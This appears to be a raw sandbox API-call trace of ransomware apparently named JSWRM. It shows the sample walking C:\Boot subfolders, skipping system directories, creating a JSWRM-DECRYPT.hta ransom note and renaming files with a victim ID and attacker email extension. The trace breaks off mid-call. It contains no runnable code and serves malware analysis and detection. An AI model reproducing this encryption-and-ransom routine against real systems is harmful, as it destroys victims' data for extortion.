RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x236fe8 [0064.000] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0064.000] GetFileAttributesW (lpFileName="C:\\Boot\\ko-KR\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\ko-kr\\jswrm-decrypt.hta")) returned 0x20 [0064.000] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236fe8 | out: hHeap=0x1e0000) returned 1 [0064.000] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0064.000] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.001] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5fc210, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0x1cce784a, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231d40 [0064.001] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.001] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5fc210, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0x1cce784a, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0064.001] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.001] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.001] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x211c6af1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10560, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0064.001] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0064.001] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0064.001] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0064.001] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0064.001] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="recovery") returned -1 [0064.001] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="perflogs") returned -1 [0064.001] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="documents and settings") returned -1 [0064.001] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0064.001] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="system volume information") returned -1 [0064.001] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="msocache") returned -1 [0064.001] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0064.001] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.001] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.001] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0064.001] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0064.001] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.001] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.002] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0064.002] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0064.002] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.002] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.002] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.002] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0064.002] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.002] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9256135561371256) returned 0 [0064.002] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0064.002] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0064.003] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0064.003] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.003] CloseHandle (hObject=0xffffffff) returned 1 [0064.003] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0064.003] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0064.003] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0064.003] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8638, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0064.003] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.003] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0064.003] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0064.003] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0064.003] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0064.003] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0064.003] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c6f0 [0064.003] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225f30 [0064.003] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c6f0 | out: hHeap=0x1e0000) returned 1 [0064.003] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0064.003] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225f30 | out: hHeap=0x1e0000) returned 1 [0064.003] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.003] MoveFileW (lpExistingFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), lpNewFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0064.003] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0064.003] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0064.003] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0064.003] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cce784a, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1cce784a, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1cce784a, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0064.003] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0064.003] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0064.004] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0064.004] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0064.004] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0064.004] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0064.004] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0064.004] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0064.004] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0064.004] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0064.004] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0064.004] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0064.004] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0064.004] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240fc0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0064.004] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0064.004] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.004] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0064.004] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0064.004] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240ef8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0064.004] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.004] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0064.004] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0064.004] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0064.004] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0064.004] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5fc210, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2fdc0d7, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xa7a0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0064.004] lstrcmpiW (lpString1="memtest.exe.mui", lpString2=".") returned 1 [0064.004] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="..") returned 1 [0064.004] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="...") returned 1 [0064.004] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="windows") returned -1 [0064.004] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="recovery") returned -1 [0064.004] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="perflogs") returned -1 [0064.004] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="documents and settings") returned 1 [0064.004] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0064.004] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="system volume information") returned -1 [0064.004] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="msocache") returned -1 [0064.004] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0064.005] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.005] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memtest.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.005] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0064.005] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0064.005] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.005] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memtest.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.005] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0064.005] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0064.005] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0064.005] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.005] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.005] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0064.005] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\memtest.exe.mui" (normalized: "c:\\boot\\ko-kr\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.005] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9251806234337896) returned 0 [0064.005] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0064.005] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0064.005] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0064.005] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.005] CloseHandle (hObject=0xffffffff) returned 1 [0064.005] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0064.005] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0064.005] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.006] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0064.006] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0064.006] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.006] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0064.006] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0064.006] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0064.006] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0064.006] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c488 [0064.006] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x226430 [0064.006] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c488 | out: hHeap=0x1e0000) returned 1 [0064.006] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0064.006] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x226430 | out: hHeap=0x1e0000) returned 1 [0064.006] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0064.006] MoveFileW (lpExistingFileName="C:\\Boot\\ko-KR\\memtest.exe.mui" (normalized: "c:\\boot\\ko-kr\\memtest.exe.mui"), lpNewFileName="C:\\Boot\\ko-KR\\memtest.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\ko-kr\\memtest.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0064.006] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0064.006] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0064.006] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0064.006] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5fc210, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2fdc0d7, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xa7a0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0064.006] FindClose (in: hFindFile=0x231d40 | out: hFindFile=0x231d40) returned 1 [0064.006] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0064.006] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0064.006] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0064.006] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48ec805, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="lt-LT", cAlternateFileName="")) returned 1 [0064.006] lstrcmpiW (lpString1="lt-LT", lpString2=".") returned 1 [0064.006] lstrcmpiW (lpString1="lt-LT", lpString2="..") returned 1 [0064.006] lstrcmpiW (lpString1="lt-LT", lpString2="...") returned 1 [0064.006] lstrcmpiW (lpString1="lt-LT", lpString2="windows") returned -1 [0064.006] lstrcmpiW (lpString1="lt-LT", lpString2="recovery") returned -1 [0064.006] lstrcmpiW (lpString1="lt-LT", lpString2="perflogs") returned -1 [0064.007] lstrcmpiW (lpString1="lt-LT", lpString2="documents and settings") returned 1 [0064.007] lstrcmpiW (lpString1="lt-LT", lpString2="$RECYCLE.BIN") returned 1 [0064.007] lstrcmpiW (lpString1="lt-LT", lpString2="system volume information") returned -1 [0064.007] lstrcmpiW (lpString1="lt-LT", lpString2="msocache") returned -1 [0064.007] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0064.007] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0064.007] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0064.007] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.007] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x2373f8 [0064.007] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.007] GetFileAttributesW (lpFileName="C:\\Boot\\lt-LT\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\lt-lt\\jswrm-decrypt.hta")) returned 0xffffffff [0064.007] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2373f8 | out: hHeap=0x1e0000) returned 1 [0064.007] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.007] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.007] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0064.007] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0064.007] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0064.007] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0064.007] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0064.007] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0064.007] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x236cc8 [0064.007] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0064.007] CreateFileW (lpFileName="C:\\Boot\\lt-LT\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\lt-lt\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0064.008] SetFilePointer (in: 